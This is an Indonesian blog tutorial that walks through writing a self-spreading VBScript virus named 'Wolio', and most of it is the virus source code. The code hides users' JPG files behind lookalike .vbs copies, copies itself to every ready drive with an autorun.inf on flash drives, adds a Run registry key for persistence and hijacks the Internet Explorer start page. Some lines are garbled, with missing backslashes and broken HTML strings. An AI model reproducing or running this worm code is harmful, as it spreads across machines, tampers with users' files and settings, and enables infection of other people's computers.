Pendahuluan
Virus komputer merupakan program komputer yang dapat
menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan
salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat merusak (misalnya dengan merusak data
pada dokumen), membuat pengguna komputer merasa terganggu, maupun tidak
menimbulkan efek sama sekali. Virus yang akan kita coba buat kali ini akan
dibuat dengan menggunakan Visual Basic Script.
Rumusan masalah
Adapun rumusan
masalahnya, yaitu :
- Icon apakah yang akan disamarkan dan berapa ukurannya?
- Pahami karakteristik virus, Apakah akan dibuat file duplikat, menyembunyikan file, menginjeksi file, atau menampilkan pesan tertentu ?
- Pahami cara kerja virus yang akan dibuat, Apakah yang akan diubah oleh virus ?
- Pahami penyebaaran virus, Apakah melalui USB flashdisk atau folder yang di share ?
Maksud dan Tujuan
Adapun maksud
dan tujuan dari pembuatan virus, diantara lain :
- Menambah wawasan dalam bidang programing, terutama dalam bahasa programing Visual Basic.
- Menambah pengetahuan dan melatih kerangka pikir.
- Virus yang dibuat akan mencari file-file .JPG pada folder dan subfolder satu tingkat didalamnya, setelah itu merubah ekstension file JPG tersebut menjadi JPEG dan merubah atributnya menjadi hidden file. Sehingga akan dikira file tersebut terhapus.
- Virus akan meng-copy-kan dirinya dalam folder-folder tertentu dalam Windows
- Memodifikasi Registry agar secara otomatis menjalankan script virus pada saat restart
- Menularkan diri pada drive-drive yang aktif termasuk flash disk
- Membuat halaman HTML tertentu agar dijalankan pada start page di Internet Explorer
Menganalisis kerja virus
Dalam tahapan ini kita harus tau bagaimana cara kerja
virus yang kita buat, karena dengan begitu kita dapat mengetahui prosedur apa
saja yang akan dilakukan, dan program kita dapat berjalan searah sesuai tujuan
yang kita inginkan. Prosedur yang akan kita buat diantaranya :
1. Pada bagian ini akan dibuat sebuah prosedur untuk mencari
file-file JPG dan merubahnya sesuai dengan skenario diatas
Sub serangan_jpg(target)
on error resume next
set ftarget=fso.GetFile(target)
set fsource = fso.GetFile(Wscript.ScriptFullName)
ftarget.Copy(Left(target,instrrev(target,”.”)) & “jpeg”)
set fbackup = fso.GetFile(Left(target,instrrev(target,”.”))
& “jpeg”)
fbackup.Attributes = 2
fsource.Copy(Left(target,instrrev(target,”.”)) & “jpg ” & “.vbs”)
ftarget.Delete
ftarget.Close
fsource.Close
End Sub
Sub carifilejpg(folder)
For Each filetarget in fso.GetFolder(folder).Files
If (Right(filetarget,3)=”jpg”) then serangan_jpg(filetarget)
Next
End Sub
2. Prosedur dibawah ini berfungsi untuk mencari drive yang
aktif termasuk media flash disk dan kemudian menularinya.
Sub serangan_drive()
Set fso = CreateObject(”Scripting.FileSystemObject”)
Set Drives=fso.drives
adaflashdisk = False
For Each drive in Drives
If drive.isready Then
fsource.Copy(drive & “” & “wolio.vbs”)
If drive.DriveType = 1 And drive.DriveLetter > “C:” Then
adaflashdisk = True
End If
Next
If adaflashdisk = True Then
set fileautorun = fso.CreateTextFile(drive.DriveLetter &
“” & “autorun.inf”,False)
fileautorun.WriteLine(”[AUTORUN]“)
fileautorun.WriteLine(”RUN=wolio.vbs”)
End If
End Sub
3. Merubah Registry agar Start Page pada Internet Explorer
menjalankan file HTML yang diinginkan
Sub serangan_ie()
If
(regedit.RegRead(”HKEY_CURRENT_USER\SOFTWARE\MicrosoftInternet
Explorer\Main\Start
Page”)<>”c:\windows\system32\wolio.html”) Then
regedit.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet
Explorer\Main\Start
Page”,”c:\windows\system32\wolio.html”
End If
End Sub
4. Bagian ini digunakan untuk membuat sebuah file HTML yang
akan menjalankan script virus
Sub buat_html()
set filehtml =
fso.CreateTextFile(”c:windowssystem32wolio.html”,True)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
“)
filehtml.WriteLine(”Welcome to Wolio”)
filehtml.WriteLine(”filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(”Selamat Datang di Wolio VBS “)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
End Sub
5. Pada bagian ini akan mencari folder yang ada dan menularinya
dengan script virus
Sub serangan_folder(foldername)
on error resume next
For Each subfolder in fso.GetFolder(foldername).SubFolders
fsource.Copy(subfolder & “wolio.vbs”)
carifilejpg(subfolder)
next
End Sub
6. Bagian dibawah ini adalah bagian yang utama gunanya untuk
mendeklarasikan variabel dan memangggil semua prosedur
On Error Resume Next
dim fso, fsource, ftarget, fbackup, scriptname, myfolder,
subfolder, preview, filetarget, sys, regedit, drive,
filehtml, fileautorun
dim adaflashdisk
set fso = CreateObject(”Scripting.FileSystemObject”)
set fsource = fso.GetFile(Wscript.ScriptFullName)
set regedit=CreateObject(”WScript.Shell”)
myfolder = Left(fsource,InStrRev(fsource,””))
‘ Copy-kan diri ke “c:windowssystem32″
fsource.Copy(”c:windowssystem32wolio.vbs”)
‘ Cari dan infeksi file JPG didalam folder
carifilejpg(myfolder)
‘ Copy-kan diri di sub folder yang ada
serangan_folder(myfolder)
‘ Regitry
if
(regedit.RegRead(”HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\Version\Run\Wolio”)<>”c:\windows\system32\wolio.vbs”)
Then
regedit.RegWrite
“HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\VersionRun\Wolio”,”c:\windows\system32\wolio.vbs”
End If
‘ Copy-kan diri ke semua drive aktif
serangan_drive()
‘ Buat file wolio.html
buat_html()
‘ Ubah Start Page di Internet Explorer
serangan_ie()
SEMOGA BERMANFAAT
Tidak ada komentar:
Posting Komentar